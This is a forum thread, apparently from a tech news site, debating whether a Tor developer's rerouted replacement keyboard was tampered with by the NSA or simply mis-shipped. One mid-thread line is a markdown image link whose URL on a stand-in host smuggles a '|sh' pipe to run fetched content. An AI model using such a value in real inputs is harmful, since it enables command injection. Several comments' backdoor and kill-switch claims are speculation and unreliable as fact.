I was thinking of those silver foils that are now put over a lot of food items so that crazies can't put stuff in them in the supermarket. I appreciate wrapping it in plastic probably wouldn't be enough to defeat the security services, but you get the idea.
Why would the NSA fuck with a TOR developer, when the federal government contributes a great deal of TOR code and actually runs exit nodes as a matter of research?
Why wouldn't they? At the very least a TOR developer might find themselves in the same room with interesting people.
> when the federal government contributes a great deal of TOR code
The US gov isn't a single monolithic entity with a singular purpose and every person working in lock-step.
> and actually runs exit nodes as a matter of research?
I wouldn't trust a gov't run TOR node. It may be fine for dissidents in uninteresting countries, but not for anyone who wants to keep their privacy safe from the US gov't.
Bugs in software are so uncommon these days that I always assume any malfunctions are due to government interference. A human making a mistake while programming or using a computer? Not bloody likely. The government trying to infect my laptop with malware contained in a replacement keyboard? That's the only possible explanation!
Some OS developers are sufficiently concerned that CPUs are NSA-modified to not trust, say, Intel's rdrand instruction anymore!
It may very well be that every single Linux system running on a recent or semi-recent CPU has a rdrand instruction returning a number "nullyfying" (from the NSA's point of view) the previous entropy sources XOR'ing.
You may call me "paranoid" but... Many people who were categorized as paranoids years ago turned out actually to be very, very far from the truth and not anywhere near paranoid enough.
I also remember a SNAFU years ago where a Windows version was compiled with some symbols left on and people started noticing variable named things like: "NSA_KEY". And, of course, lots of PR ensued and there was nothing to see and there were very reasonable explanation as to why there were NSA specific things in Windows.
Contrarily to you I believe it is very likely that most Windows and Apple OSes are backdoored by the NSA and I believe it's far from impossible that several piece of hardware are also backdoored.
I also think it's not impossible that several network cards have "kill switches" where a certain packet combination bricks the card . There have been weird reports out there from people seeing really strange things making such a possibility not science-fiction.
Every PC comes with malware already installed by most manufacturers. (Yes, if I have to spend time removing bloated stuff it's malware, I don't care if it's an "antivirus demo" or something like that)
Now, if it's a hardware detail, this is more interesting.
Not all malware can be removed the way you remove that antivirus demo. From the Der Spiegel article[1]:
> Take, for example, when they intercept shipping deliveries. If a target person, agency or company orders a new computer or related accessories, for example, TAO can divert the shipping delivery to its own secret workshops. The NSA calls this method interdiction. At these so-called "load stations," agents carefully open the package in order to load malware onto the electronics, or even install hardware components that can provide backdoor access for the intelligence agencies. All subsequent steps can then be conducted from the comfort of a remote computer.
Naturally, if they also load a keyboard logger or whatever, no amount of formatting that new laptop would help.
What about changing your BIOS to intercept keystrokes? Or hacking the hard drive firmware, so they would have the master key for your encrypted disk next time you cross the border? A lot more effective than any other software-based solution.
A few years ago we'd say this is all crazy conspiracy theory. Nowadays this this is just NSA's business as usual tactics [1].
Really stupid move to post this on twitter before getting it. Should have just taken a screenshot then waited for it to show up. Then post the screenshot and have people analyze the keyboard.
By posting before getting the package, the NSA could see the Twitter post and give a non-modified one instead.
I wonder what she's going to do with the keyboard when she gets it. Send it back and buy one locally? Examine it in detail for bugs/weirdness, and then use it normally? Connect it to a spare laptop, and use it to do searches for the weirdest porn you can think of?
Isn't it obvious this is some kind of weird reverse-psychology ? They can always call catch 22 , or they need not to , we can only guess . But it's kind of obvious this happened to dismiss the fact they ARE doing this on regular basis .
Nonsense. Every single piece on those laptops already leaks more than a teabag, every protocol does more information broadcasting than the BBC, why would they have it shipped to the headquarters?
NSA's job is to bug computers before they even enter Amazon.
The reason we're discussing this, is because of the laptop's/keyboard's owner: A TOR developer. If this was uncle Joe no one would even care, because probably his Facebook data is all that matters anyway.
I live in Ashburn, VA. I've had a package routed through Ashburn, GA. Someone got confused between Washington(the state) and Washington(DC)...? Occam's razor people...
fwiw I recently had a large, professional shipment company state that my product had been delivered to the new town over, albeit to the same street address I had ordered it to.
The product was in my po box, but the shipping company claimed it wad delivered to another adjacent town.
Never attribute to malice that which is adequately explained by stupidity.
A few months ago, I ordered some RAM from Crucial. They used UPS Mail Innovation, a service by UPS that mails packages for you. I got my package, but the tracker showed it getting delivered to another address on the other side of the country. So maybe there's a bug somewhere in the USPS system that shows you the tracking of the wrong package?
![http://innocent-looking.org/logo.jpg|sh"](http://innocent-looking.org/logo.jpg|sh"){kind=link}
[wild audience applause]
THAT'S RIGHT, it's time for WHICH IS MORE LIKELY?!
[intro music]
Today on Which is More Likely?, we're looking at a replacement Lenovo Thinkpad keyboard that was shipped to Alexandria, Virginia, instead of Seattle, Washington. What a blunder! [slide whistle sound effect]
Now put your thinking caps on and ponder, WHICH IS MORE LIKELY?!
• The largest intelligence agency on the planet, recently outed by Snowden's leaked documents for operating a multi-decade worldwide dragnet that secretly gathered communications on hundreds of millions of people, was too incompetent to have the US Postal Service display tracking information that hides the fact they're modifying a laptop keyboard in order to somehow spy on a Tor developer.
ORRRRRRRRRR!
• The third-party seller who uses Amazon to accept orders screwed up and gave Amazon the wrong tracking number.
That's all we have time for on today's episode of Which is More Likely? Don't change the channel! Up next is a BRAND NEW episode of Godwin's Law and Order! Good night from Hollywood!
[outro music]